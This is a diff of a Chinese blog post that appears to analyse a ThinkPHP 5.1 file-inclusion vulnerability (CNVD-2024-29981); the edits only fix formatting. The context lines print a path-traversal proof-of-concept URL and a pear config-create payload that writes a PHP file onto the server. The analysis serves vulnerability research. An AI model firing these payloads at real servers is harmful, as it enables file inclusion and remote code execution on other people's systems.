--- a/_posts/2024-4-24-Thinkphp5.1文件包含-CNVD-2024-29981.md
+++ b/_posts/2024-4-24-Thinkphp5.1文件包含-CNVD-2024-29981.md
@@ -6,7 +6,7 @@ author: "XinYiSleep"
 ```info
 time:   4.24
 测试版本:   thinkphp 5.1.41
-php:    7.3.4<br>
+php:    7.3.4
 影响范围:   thinkphp5.1.0--thinkphp5.1.* （windows）: linux无法利用
 漏洞利用poc:    index.php?s=..\..\你要包含的路径/index/index
 pear进行命令执行poc:  /index.php?s=..\..\..\Extensions\php\php7.3.4nts\pear\&+config-create+/<?=phpinfo();?>+1.php
@@ -17,8 +17,8 @@ pear进行命令执行poc:  /index.php?s=..\..\..\Extensions\php\php7.3.4nts\pea
 **<font style="color:#000000;">在Thinkphp5中路由可以使用一下两种方式都可以访问到执行的方法中如： </font>**
 
 ```color5
-[http://127.0.0.1/index.php/index/index/hello](http://127.0.0.1/index.php/index/index/hellohttp://127.0.0.1/index.php?s=index/index/hello//)
-[http://127.0.0.1/index.php?s=index/index/hello](http://127.0.0.1/index.php/index/index/hellohttp://127.0.0.1/index.php?s=index/index/hello//)
+http://127.0.0.1/index.php/index/index/hello
+http://127.0.0.1/index.php?s=index/index/hello
 //简单一点来说其实就是对应的 模块/控制器/方法
 ```
 ![image](https://xinyisleep.github.io/img/2024/thinkphp5/1743331708376.jpg)
@@ -28,7 +28,7 @@ http://127.0.0.1/index.php?s=index/index/hello
 ![image](https://xinyisleep.github.io/img/2024/thinkphp5/1743331771501.jpg)  
 进入run方法，
 ![image](https://xinyisleep.github.io/img/2024/thinkphp5/1743331806586.jpg)  
-**走到405行routeCheck方法，根据注释也可以看出来是进行路由检测接着往下看，**
+走到405行routeCheck方法，根据注释也可以看出来是进行路由检测接着往下看
 ![image](https://xinyisleep.github.io/img/2024/thinkphp5/1743331839134.jpg)  
 600行path方法，
 ![image](https://xinyisleep.github.io/img/2024/thinkphp5/1743331875986.jpg)
